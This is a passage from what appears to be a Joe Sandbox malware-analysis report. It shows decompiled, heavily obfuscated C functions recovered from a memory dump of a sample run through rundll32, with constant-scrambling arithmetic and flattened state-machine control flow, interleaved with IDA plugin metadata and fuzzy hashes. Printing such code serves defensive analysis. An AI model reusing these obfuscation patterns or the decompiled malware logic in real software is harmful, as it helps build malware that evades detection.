                                                                                                                      				_t308 = 0x3c;
                                                                                                                      				_v1092 = _v1092 / _t308;
                                                                                                                      				_v1092 = _v1092 >> 1;
                                                                                                                      				_v1092 = _v1092 ^ 0x000c3f19;
                                                                                                                      				_v1140 = 0x5b7912;
                                                                                                                      				_v1140 = _v1140 + 0xffff68b5;
                                                                                                                      				_t309 = 0x6d;
                                                                                                                      				_v1140 = _v1140 * 0xe;
                                                                                                                      				_v1140 = _v1140 >> 1;
                                                                                                                      				_v1140 = _v1140 ^ 0x02711af4;
                                                                                                                      				_v1120 = 0xf0336c;
                                                                                                                      				_v1120 = _v1120 + 0x850d;
                                                                                                                      				_v1120 = _v1120 << 3;
                                                                                                                      				_v1120 = _v1120 / _t309;
                                                                                                                      				_v1120 = _v1120 ^ 0x00151fd7;
                                                                                                                      				_v1112 = 0x1d5cd4;
                                                                                                                      				_v1112 = _v1112 << 7;
                                                                                                                      				_v1112 = _v1112 | 0x8feadd76;
                                                                                                                      				_v1112 = _v1112 << 0x10;
                                                                                                                      				_v1112 = _v1112 ^ 0xff743f21;
                                                                                                                      				_v1116 = 0x1a947a;
                                                                                                                      				_v1116 = _v1116 + 0x75f0;
                                                                                                                      				_v1116 = _v1116 << 0xa;
                                                                                                                      				_t310 = 0x5a;
                                                                                                                      				_v1116 = _v1116 * 0x6e;
                                                                                                                      				_v1116 = _v1116 ^ 0x79e60e9e;
                                                                                                                      				_v1124 = 0xbb349e;
                                                                                                                      				_v1124 = _v1124 / _t310;
                                                                                                                      				_v1124 = _v1124 << 8;
                                                                                                                      				_t311 = 0x54;
                                                                                                                      				_v1124 = _v1124 / _t311;
                                                                                                                      				_v1124 = _v1124 ^ 0x000c08c5;
                                                                                                                      				_v1080 = 0xb1ec11;
                                                                                                                      				_v1080 = _v1080 | 0x4ad04b34;
                                                                                                                      				_v1080 = _v1080 ^ 0x4af1877a;
                                                                                                                      				_v1072 = 0x6450ea;
                                                                                                                      				_v1072 = _v1072 ^ 0x5bd0ca6d;
                                                                                                                      				_v1072 = _v1072 ^ 0x5bbfa4d9;
                                                                                                                      				_v1100 = 0x193680;
                                                                                                                      				_v1100 = _v1100 + 0xffff84f1;
                                                                                                                      				_t312 = 0x39;
                                                                                                                      				_v1100 = _v1100 / _t312;
                                                                                                                      				_v1100 = _v1100 ^ 0x185ca7c1;
                                                                                                                      				_v1100 = _v1100 ^ 0x1855126a;
                                                                                                                      				_v1108 = 0xe40e26;
                                                                                                                      				_v1108 = _v1108 + 0xffff805f;
                                                                                                                      				_v1108 = _v1108 << 4;
                                                                                                                      				_v1108 = _v1108 ^ 0x0e3caf6d;
                                                                                                                      				do {
                                                                                                                      					while(_t266 != 0x35a8362) {
                                                                                                                      						if(_t266 == 0x706ecca) {
                                                                                                                      							E002CE498(_v1072, _v1100, _v1108,  &_v1040);
                                                                                                                      						} else {
                                                                                                                      							if(_t266 == 0xd630330) {
                                                                                                                      								_push( &_v520);
                                                                                                                      								_push( &_v1040);
                                                                                                                      								_push(_v1080);
                                                                                                                      								_t255 = E002B8D95(_v1116, _v1124, __eflags);
                                                                                                                      								_t315 =  &(_t315[3]);
                                                                                                                      								__eflags = _t255;
                                                                                                                      								_t302 =  !=  ? 1 : _t302;
                                                                                                                      								_t266 = 0x706ecca;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t266 == 0xdb8f695) {
                                                                                                                      									E002D12A8(_t266, _v1060, __eflags, _v1084, _v1132,  &_v520);
                                                                                                                      									_t315 =  &(_t315[3]);
                                                                                                                      									_t266 = 0xe8d55c7;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									_t322 = _t266 - 0xe8d55c7;
                                                                                                                      									if(_t266 != 0xe8d55c7) {
                                                                                                                      										goto L10;
                                                                                                                      									} else {
                                                                                                                      										_push(_v1068);
                                                                                                                      										_push(_v1096);
                                                                                                                      										_push(0x2b10cc);
                                                                                                                      										_t258 = E002BAB66(_v1136, _v1076, _t322);
                                                                                                                      										_t259 =  *0x2d520c; // 0x0
                                                                                                                      										_t261 =  *0x2d520c; // 0x0
                                                                                                                      										E002BE7CE(_t258, _t322, _v1128, _t261 + 8, _v1136, _v1104, _v1064, _v1088, _v1092, _t259 + 0x220);
                                                                                                                      										E002BAE03(_v1140, _v1120, _v1112, _t258);
                                                                                                                      										_t315 =  &(_t315[0xd]);
                                                                                                                      										_t266 = 0xd630330;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L13:
                                                                                                                      						return _t302;
                                                                                                                      					}
                                                                                                                      					_t266 = 0xdb8f695;
                                                                                                                      					L10:
                                                                                                                      					__eflags = _t266 - 0x3cedcca;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L13;
                                                                                                                      			}















































                                                                                                                      0x002bfd1a
                                                                                                                      0x002bfd1d
                                                                                                                      0x00000000
                                                                                                                      0x002bfc84
                                                                                                                      0x002bfc84
                                                                                                                      0x002bfc86
                                                                                                                      0x00000000
                                                                                                                      0x002bfc8c
                                                                                                                      0x002bfc8c
                                                                                                                      0x002bfc90
                                                                                                                      0x002bfc9c
                                                                                                                      0x002bfca1
                                                                                                                      0x002bfcab
                                                                                                                      0x002bfcc8
                                                                                                                      0x002bfcdd
                                                                                                                      0x002bfcef
                                                                                                                      0x002bfcf4
                                                                                                                      0x002bfcf7
                                                                                                                      0x00000000
                                                                                                                      0x002bfcf7
                                                                                                                      0x002bfc86
                                                                                                                      0x002bfc82
                                                                                                                      0x002bfc7a
                                                                                                                      0x002bfd7f
                                                                                                                      0x002bfd8b
                                                                                                                      0x002bfd8b
                                                                                                                      0x002bfd57
                                                                                                                      0x002bfd59
                                                                                                                      0x002bfd59
                                                                                                                      0x002bfd59
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *7$Pd$6
                                                                                                                      • API String ID: 0-2172486832
                                                                                                                      • Opcode ID: 6cfd90a064c61de5b50df33eb4b54f46b68187338c982b2e59ca1998eb5ad06f
                                                                                                                      • Instruction ID: e46143a6a0990992418d4f74f91cea610b2b4fab01d1d1f6ec345458094ef3a3
                                                                                                                      • Opcode Fuzzy Hash: 6cfd90a064c61de5b50df33eb4b54f46b68187338c982b2e59ca1998eb5ad06f
                                                                                                                      • Instruction Fuzzy Hash: 73B143B15183409FD354CF26C98A94FFBE1FBC8758F408A2EF69686260D7B18909CF46
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 75%
                                                                                                                      			E002B8D95(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                      				void* _t231;
                                                                                                                      				signed int _t261;
                                                                                                                      				signed int _t265;
                                                                                                                      				signed int _t266;
                                                                                                                      				signed int _t267;
                                                                                                                      				signed int _t268;
                                                                                                                      				void* _t269;
                                                                                                                      				intOrPtr* _t290;
                                                                                                                      				void* _t291;
                                                                                                                      
                                                                                                                      				_t290 = _t291 - 0x6c;
                                                                                                                      				_push( *((intOrPtr*)(_t290 + 0x7c)));
                                                                                                                      				_push( *((intOrPtr*)(_t290 + 0x78)));
                                                                                                                      				_push( *((intOrPtr*)(_t290 + 0x74)));
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E002BCF25(_t231);
                                                                                                                      				 *(_t290 + 8) =  *(_t290 + 8) & 0x00000000;
                                                                                                                      				 *_t290 = 0x81872b;
                                                                                                                      				 *((intOrPtr*)(_t290 + 4)) = 0xdf4fac;
                                                                                                                      				 *(_t290 + 0x2c) = 0x807aaf;
                                                                                                                      				_t265 = 0x3e;
                                                                                                                      				 *(_t290 + 0x2c) =  *(_t290 + 0x2c) * 0x66;
                                                                                                                      				 *(_t290 + 0x2c) =  *(_t290 + 0x2c) >> 0xc;
                                                                                                                      				 *(_t290 + 0x2c) =  *(_t290 + 0x2c) ^ 0x0003330f;
                                                                                                                      				 *(_t290 + 0x50) = 0x6f2162;
                                                                                                                      				 *(_t290 + 0x50) =  *(_t290 + 0x50) >> 4;
                                                                                                                      				 *(_t290 + 0x50) =  *(_t290 + 0x50) * 0x62;
                                                                                                                      				 *(_t290 + 0x50) =  *(_t290 + 0x50) + 0xffffa9e2;
                                                                                                                      				 *(_t290 + 0x50) =  *(_t290 + 0x50) ^ 0x02a8505a;
                                                                                                                      				 *(_t290 + 0x58) = 0xe574ec;
                                                                                                                      				 *(_t290 + 0x58) =  *(_t290 + 0x58) + 0x326d;
                                                                                                                      				 *(_t290 + 0x58) =  *(_t290 + 0x58) ^ 0x9da0d68a;
                                                                                                                      				 *(_t290 + 0x58) =  *(_t290 + 0x58) + 0xbde6;
                                                                                                                      				 *(_t290 + 0x58) =  *(_t290 + 0x58) ^ 0x9d4627b9;
                                                                                                                      				 *(_t290 + 0x20) = 0xd3956a;
                                                                                                                      				 *(_t290 + 0x20) =  *(_t290 + 0x20) * 0x24;
                                                                                                                      				 *(_t290 + 0x20) =  *(_t290 + 0x20) ^ 0x1dc1e5a2;
                                                                                                                      				 *(_t290 + 0x14) = 0xfcd290;
                                                                                                                      				 *(_t290 + 0x14) =  *(_t290 + 0x14) >> 0x10;
                                                                                                                      				 *(_t290 + 0x14) =  *(_t290 + 0x14) ^ 0x00095bca;
                                                                                                                      				 *(_t290 + 0x64) = 0x85109;
                                                                                                                      				 *(_t290 + 0x64) =  *(_t290 + 0x64) | 0x78e3fbb1;
                                                                                                                      				 *(_t290 + 0x64) =  *(_t290 + 0x64) + 0xffffa60f;
                                                                                                                      				 *(_t290 + 0x64) =  *(_t290 + 0x64) | 0x3bc8e61c;
                                                                                                                      				 *(_t290 + 0x64) =  *(_t290 + 0x64) ^ 0x7bee7ea1;
                                                                                                                      				 *(_t290 + 0x3c) = 0x71f5e0;
                                                                                                                      				 *(_t290 + 0x3c) =  *(_t290 + 0x3c) >> 3;
                                                                                                                      				 *(_t290 + 0x3c) =  *(_t290 + 0x3c) + 0xebfe;
                                                                                                                      				 *(_t290 + 0x3c) =  *(_t290 + 0x3c) ^ 0x0002c43f;
                                                                                                                      				 *(_t290 + 0x28) = 0x899f0e;
                                                                                                                      				 *(_t290 + 0x28) =  *(_t290 + 0x28) + 0x8a6f;
                                                                                                                      				 *(_t290 + 0x28) =  *(_t290 + 0x28) ^ 0x0089e2c7;
                                                                                                                      				 *(_t290 + 0x54) = 0x38c331;
                                                                                                                      				 *(_t290 + 0x54) =  *(_t290 + 0x54) / _t265;
                                                                                                                      				 *(_t290 + 0x54) =  *(_t290 + 0x54) ^ 0x1d97b6ad;
                                                                                                                      				_t266 = 0x30;
                                                                                                                      				 *(_t290 + 0x54) =  *(_t290 + 0x54) / _t266;
                                                                                                                      				 *(_t290 + 0x54) =  *(_t290 + 0x54) ^ 0x0098c8d2;
                                                                                                                      				 *(_t290 + 0x38) = 0xd05f1;
                                                                                                                      				 *(_t290 + 0x38) =  *(_t290 + 0x38) >> 7;
                                                                                                                      				 *(_t290 + 0x38) =  *(_t290 + 0x38) << 0xf;
                                                                                                                      				 *(_t290 + 0x38) =  *(_t290 + 0x38) ^ 0x0d051a45;
                                                                                                                      				 *(_t290 + 0x30) = 0x1cfed4;
                                                                                                                      				 *(_t290 + 0x30) =  *(_t290 + 0x30) >> 0x10;
                                                                                                                      				 *(_t290 + 0x30) =  *(_t290 + 0x30) ^ 0xc4190834;
                                                                                                                      				 *(_t290 + 0x30) =  *(_t290 + 0x30) ^ 0xc41fa725;
                                                                                                                      				 *(_t290 + 0x40) = 0x1c7373;
                                                                                                                      				 *(_t290 + 0x40) =  *(_t290 + 0x40) * 0x75;
                                                                                                                      				 *(_t290 + 0x40) =  *(_t290 + 0x40) << 0xc;
                                                                                                                      				 *(_t290 + 0x40) =  *(_t290 + 0x40) ^ 0x0c3b1071;
                                                                                                                      				 *(_t290 + 0x18) = 0x2a4c72;
                                                                                                                      				 *(_t290 + 0x18) =  *(_t290 + 0x18) >> 0xe;
                                                                                                                      				 *(_t290 + 0x18) =  *(_t290 + 0x18) ^ 0x00012640;
                                                                                                                      				 *(_t290 + 0x4c) = 0xadab42;
                                                                                                                      				 *(_t290 + 0x4c) =  *(_t290 + 0x4c) + 0xc082;
                                                                                                                      				 *(_t290 + 0x4c) =  *(_t290 + 0x4c) ^ 0x0f040eb7;
                                                                                                                      				 *(_t290 + 0x4c) =  *(_t290 + 0x4c) | 0xc54ebe7a;
                                                                                                                      				 *(_t290 + 0x4c) =  *(_t290 + 0x4c) ^ 0xcfe19c3b;
                                                                                                                      				 *(_t290 + 0x5c) = 0x1c041c;
                                                                                                                      				 *(_t290 + 0x5c) =  *(_t290 + 0x5c) + 0x881f;
                                                                                                                      				 *(_t290 + 0x5c) =  *(_t290 + 0x5c) + 0xa114;
                                                                                                                      				 *(_t290 + 0x5c) =  *(_t290 + 0x5c) << 2;
                                                                                                                      				 *(_t290 + 0x5c) =  *(_t290 + 0x5c) ^ 0x007200ac;
                                                                                                                      				 *(_t290 + 0x44) = 0x9cf7da;
                                                                                                                      				 *(_t290 + 0x44) =  *(_t290 + 0x44) | 0xc9a894cc;
                                                                                                                      				_t267 = 3;
                                                                                                                      				 *(_t290 + 0x44) =  *(_t290 + 0x44) * 0xa;
                                                                                                                      				 *(_t290 + 0x44) =  *(_t290 + 0x44) ^ 0xe16343df;
                                                                                                                      				 *(_t290 + 0x60) = 0x461ba6;
                                                                                                                      				_t268 = 0xd;
                                                                                                                      				 *(_t290 + 0x60) =  *(_t290 + 0x60) / _t267;
                                                                                                                      				 *(_t290 + 0x60) =  *(_t290 + 0x60) + 0x5831;
                                                                                                                      				 *(_t290 + 0x60) =  *(_t290 + 0x60) ^ 0xab0fd2ba;
                                                                                                                      				 *(_t290 + 0x60) =  *(_t290 + 0x60) ^ 0xab16638d;
                                                                                                                      				 *(_t290 + 0x68) = 0x8d460c;
                                                                                                                      				 *(_t290 + 0x68) =  *(_t290 + 0x68) * 0x3f;
                                                                                                                      				 *(_t290 + 0x68) =  *(_t290 + 0x68) + 0x2d22;
                                                                                                                      				 *(_t290 + 0x68) =  *(_t290 + 0x68) / _t268;
                                                                                                                      				 *(_t290 + 0x68) =  *(_t290 + 0x68) ^ 0x02a3ee27;
                                                                                                                      				 *(_t290 + 0x34) = 0x2e04ca;
                                                                                                                      				 *(_t290 + 0x34) =  *(_t290 + 0x34) | 0xfffff3f9;
                                                                                                                      				 *(_t290 + 0x34) =  *(_t290 + 0x34) ^ 0xfffa6071;
                                                                                                                      				 *(_t290 + 0x10) = 0xbf0768;
                                                                                                                      				 *(_t290 + 0x10) =  *(_t290 + 0x10) + 0xffff288c;
                                                                                                                      				 *(_t290 + 0x10) =  *(_t290 + 0x10) ^ 0x00be6359;
                                                                                                                      				 *(_t290 + 0xc) = 0xd072fa;
                                                                                                                      				 *(_t290 + 0xc) =  *(_t290 + 0xc) << 1;
                                                                                                                      				 *(_t290 + 0xc) =  *(_t290 + 0xc) ^ 0x01aa1a0e;
                                                                                                                      				 *(_t290 + 0x1c) = 0x9f8a7b;
                                                                                                                      				 *(_t290 + 0x1c) =  *(_t290 + 0x1c) ^ 0xfb0eca93;
                                                                                                                      				 *(_t290 + 0x1c) =  *(_t290 + 0x1c) ^ 0xfb998053;
                                                                                                                      				 *(_t290 + 0x24) = 0xd784f2;
                                                                                                                      				 *(_t290 + 0x24) =  *(_t290 + 0x24) << 5;
                                                                                                                      				 *(_t290 + 0x24) =  *(_t290 + 0x24) ^ 0x1afc882d;
                                                                                                                      				 *(_t290 + 0x48) = 0xfdbd11;
                                                                                                                      				 *(_t290 + 0x48) =  *(_t290 + 0x48) ^ 0xbb0d2ead;
                                                                                                                      				 *(_t290 + 0x48) =  *(_t290 + 0x48) >> 0xa;
                                                                                                                      				 *(_t290 + 0x48) =  *(_t290 + 0x48) + 0xffffcd0b;
                                                                                                                      				 *(_t290 + 0x48) =  *(_t290 + 0x48) ^ 0x002ef0f8;
                                                                                                                      				_push( *(_t290 + 0x3c));
                                                                                                                      				_push( *(_t290 + 0x64));
                                                                                                                      				_push( *(_t290 + 0x14));
                                                                                                                      				_push( *(_t290 + 0x20));
                                                                                                                      				_t269 = 0x1e;
                                                                                                                      				E002D1310(_t269, _t290 - 0x20);
                                                                                                                      				E002D1310(0x208, _t290 - 0x228,  *(_t290 + 0x28),  *(_t290 + 0x54),  *(_t290 + 0x38),  *(_t290 + 0x30));
                                                                                                                      				E002D1310(0x208, _t290 - 0x430,  *(_t290 + 0x40),  *(_t290 + 0x18),  *(_t290 + 0x4c),  *(_t290 + 0x5c));
                                                                                                                      				E002C08A0( *((intOrPtr*)(_t290 + 0x7c)),  *(_t290 + 0x44),  *(_t290 + 0x60), _t290 - 0x228,  *(_t290 + 0x68));
                                                                                                                      				E002C08A0( *((intOrPtr*)(_t290 + 0x78)),  *(_t290 + 0x34),  *(_t290 + 0x10), _t290 - 0x430,  *(_t290 + 0xc));
                                                                                                                      				 *(_t290 - 0x1c) =  *(_t290 + 0x2c);
                                                                                                                      				 *((intOrPtr*)(_t290 - 0x18)) = _t290 - 0x228;
                                                                                                                      				 *((intOrPtr*)(_t290 - 0x14)) = _t290 - 0x430;
                                                                                                                      				 *((short*)(_t290 - 0x10)) =  *(_t290 + 0x58) |  *(_t290 + 0x50) | 0x00000410;
                                                                                                                      				_t261 = E002CE2C5( *(_t290 + 0x1c),  *(_t290 + 0x24),  *(_t290 + 0x48), _t290 - 0x20);
                                                                                                                      				asm("sbb eax, eax");
                                                                                                                      				return  ~_t261 + 1;
                                                                                                                      			}













                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: b!o$rL*$t
                                                                                                                      • API String ID: 0-1909624753
                                                                                                                      • Opcode ID: 08792196a01ec6f0438129d1e16b46a7bb7c069241e3f29c323c54d08d570b65
                                                                                                                      • Instruction ID: c0ffaabf7921ed332434e5b2ea986fecc7b32633f74491f1bd7510f7fba6ff7d
                                                                                                                      • Opcode Fuzzy Hash: 08792196a01ec6f0438129d1e16b46a7bb7c069241e3f29c323c54d08d570b65
                                                                                                                      • Instruction Fuzzy Hash: 39B1DC7141038D9BDF59CF61C98A9CE3BA1FF44348F108219FE1A96260D7B5C9A9CF84
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E002BB41A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                      				char _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				unsigned int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				void* _t125;
                                                                                                                      				void* _t136;
                                                                                                                      				intOrPtr _t140;
                                                                                                                      				void* _t146;
                                                                                                                      				signed int _t159;
                                                                                                                      				signed int _t160;
                                                                                                                      				signed int _t161;
                                                                                                                      				void* _t163;
                                                                                                                      				signed int* _t166;
                                                                                                                      
                                                                                                                      				_push(1);
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(1);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E002BCF25(_t125);
                                                                                                                      				_v56 = 0xe46139;
                                                                                                                      				_t166 =  &(( &_v60)[7]);
                                                                                                                      				_v56 = _v56 + 0x2728;
                                                                                                                      				_v56 = _v56 ^ 0xfa290e75;
                                                                                                                      				_t163 = 0;
                                                                                                                      				_v56 = _v56 >> 4;
                                                                                                                      				_t146 = 0x6cc7f8c;
                                                                                                                      				_v56 = _v56 ^ 0x0fa05392;
                                                                                                                      				_v60 = 0xdd8405;
                                                                                                                      				_v60 = _v60 + 0xffff7544;
                                                                                                                      				_t159 = 0x13;
                                                                                                                      				_v60 = _v60 / _t159;
                                                                                                                      				_t160 = 0x4a;
                                                                                                                      				_v60 = _v60 * 0x44;
                                                                                                                      				_v60 = _v60 ^ 0x03147b15;
                                                                                                                      				_v40 = 0xb1f638;
                                                                                                                      				_v40 = _v40 / _t160;
                                                                                                                      				_v40 = _v40 + 0xfdde;
                                                                                                                      				_v40 = _v40 ^ 0x000bffc0;
                                                                                                                      				_v20 = 0xc1e326;
                                                                                                                      				_v20 = _v20 << 0xb;
                                                                                                                      				_v20 = _v20 ^ 0x0f1113ff;
                                                                                                                      				_v24 = 0x9dff8e;
                                                                                                                      				_v24 = _v24 << 5;
                                                                                                                      				_v24 = _v24 ^ 0x13be58e4;
                                                                                                                      				_v44 = 0x26f48e;
                                                                                                                      				_v44 = _v44 >> 3;
                                                                                                                      				_v44 = _v44 >> 4;
                                                                                                                      				_v44 = _v44 ^ 0x0002f448;
                                                                                                                      				_v48 = 0xa078f9;
                                                                                                                      				_t161 = 0x1c;
                                                                                                                      				_v48 = _v48 * 0xe;
                                                                                                                      				_v48 = _v48 ^ 0x04e4b6a4;
                                                                                                                      				_v48 = _v48 ^ 0x0c2dbe80;
                                                                                                                      				_v52 = 0xb739f4;
                                                                                                                      				_v52 = _v52 ^ 0x18b1fcfd;
                                                                                                                      				_v52 = _v52 ^ 0x2d0276e6;
                                                                                                                      				_v52 = _v52 ^ 0x3502a25a;
                                                                                                                      				_v28 = 0x1e50a5;
                                                                                                                      				_v28 = _v28 / _t161;
                                                                                                                      				_v28 = _v28 ^ 0x0008472d;
                                                                                                                      				_v32 = 0x99faaf;
                                                                                                                      				_v32 = _v32 + 0xfffffde3;
                                                                                                                      				_v32 = _v32 ^ 0x0091a9c4;
                                                                                                                      				_v36 = 0x23e8f3;
                                                                                                                      				_v36 = _v36 >> 1;
                                                                                                                      				_v36 = _v36 * 0x5a;
                                                                                                                      				_v36 = _v36 ^ 0x064f5444;
                                                                                                                      				_v8 = 0xf9c016;
                                                                                                                      				_v8 = _v8 | 0x76d0de1d;
                                                                                                                      				_v8 = _v8 ^ 0x76f7039e;
                                                                                                                      				_v12 = 0x650156;
                                                                                                                      				_v12 = _v12 >> 5;
                                                                                                                      				_v12 = _v12 ^ 0x000fa496;
                                                                                                                      				_v16 = 0x5361c2;
                                                                                                                      				_v16 = _v16 ^ 0x712c2ae6;
                                                                                                                      				_v16 = _v16 ^ 0x71790bc8;
                                                                                                                      				_t162 = _v4;
                                                                                                                      				do {
                                                                                                                      					while(_t146 != 0x2367fc3) {
                                                                                                                      						if(_t146 == 0x555e5ab) {
                                                                                                                      							E002D13B1(_v4, _v44, _v48, _v52, 1, _a8, 1, _t146, _v28, _v32, _a4);
                                                                                                                      							_t166 =  &(_t166[9]);
                                                                                                                      							_t146 = 0xbed5482;
                                                                                                                      							_t163 =  !=  ? 1 : _t163;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t146 == 0x6cc7f8c) {
                                                                                                                      								_t146 = 0x9230dbb;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t146 == 0x9230dbb) {
                                                                                                                      									_t140 = E002B9685(_t146);
                                                                                                                      									_t162 = _t140;
                                                                                                                      									if(_t140 != 0xffffffff) {
                                                                                                                      										_t146 = 0x2367fc3;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t146 != 0xbed5482) {
                                                                                                                      										goto L15;
                                                                                                                      									} else {
                                                                                                                      										E002C4DAD(_v36, _v8, _v4, _v12, _v16);
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L7:
                                                                                                                      						return _t163;
                                                                                                                      					}
                                                                                                                      					_t136 = E002CFB2B(_v40,  &_v4, _v20, _v24, _t162);
                                                                                                                      					_t166 =  &(_t166[3]);
                                                                                                                      					if(_t136 == 0) {
                                                                                                                      						_t146 = 0x362db31;
                                                                                                                      						goto L15;
                                                                                                                      					} else {
                                                                                                                      						_t146 = 0x555e5ab;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L7;
                                                                                                                      					L15:
                                                                                                                      				} while (_t146 != 0x362db31);
                                                                                                                      				goto L7;
                                                                                                                      			}




























                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ('$9a$*,q
                                                                                                                      • API String ID: 0-3312093510
                                                                                                                      • Opcode ID: 91551d8a3a33aa242dcb579ab556c5323ead86a65d26f531dae9fc8f6b11891c
                                                                                                                      • Instruction ID: d1eae52bac0f10d12ab35e804e1395866176299c371f6c876f33e29fdd7f579e
                                                                                                                      • Opcode Fuzzy Hash: 91551d8a3a33aa242dcb579ab556c5323ead86a65d26f531dae9fc8f6b11891c
                                                                                                                      • Instruction Fuzzy Hash: 586142711183419FC759CF21998A82FBBE6FBC4398F544A1DF59296260C3B1CA68CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E002CC38F(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                      				signed int _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				intOrPtr _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				void* _t139;
                                                                                                                      				void* _t153;
                                                                                                                      				signed int _t154;
                                                                                                                      				void* _t157;
                                                                                                                      				void* _t169;
                                                                                                                      				signed int _t170;
                                                                                                                      				signed int _t171;
                                                                                                                      				void* _t173;
                                                                                                                      				signed int* _t175;
                                                                                                                      
                                                                                                                      				_t155 = _a4;
                                                                                                                      				_push(_a8);
                                                                                                                      				_t173 = __edx;
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E002BCF25(_t139);
                                                                                                                      				_v8 = _v8 & 0x00000000;
                                                                                                                      				_t175 =  &(( &_v80)[4]);
                                                                                                                      				_v4 = _v4 & 0x00000000;
                                                                                                                      				_v16 = 0x6f933c;
                                                                                                                      				_t169 = 0;
                                                                                                                      				_v12 = 0xacafca;
                                                                                                                      				_t157 = 0x2c6486;
                                                                                                                      				_v40 = 0xf6c939;
                                                                                                                      				_t170 = 0xb;
                                                                                                                      				_v40 = _v40 / _t170;
                                                                                                                      				_v40 = _v40 ^ 0x00166f60;
                                                                                                                      				_v36 = 0x3062f8;
                                                                                                                      				_v36 = _v36 << 9;
                                                                                                                      				_v36 = _v36 ^ 0x60c5f010;
                                                                                                                      				_v56 = 0xc1f429;
                                                                                                                      				_v56 = _v56 << 9;
                                                                                                                      				_v56 = _v56 << 3;
                                                                                                                      				_v56 = _v56 ^ 0x5f429000;
                                                                                                                      				_v80 = 0x6a6c05;
                                                                                                                      				_v80 = _v80 | 0xf56e7669;
                                                                                                                      				_t171 = 0x32;
                                                                                                                      				_v80 = _v80 * 0x6f;
                                                                                                                      				_v80 = _v80 + 0xffff851e;
                                                                                                                      				_v80 = _v80 ^ 0x6ae37c08;
                                                                                                                      				_v60 = 0x567c0c;
                                                                                                                      				_v60 = _v60 + 0xd503;
                                                                                                                      				_v60 = _v60 * 0x3a;
                                                                                                                      				_v60 = _v60 ^ 0x13c3775e;
                                                                                                                      				_v64 = 0x59a2ac;
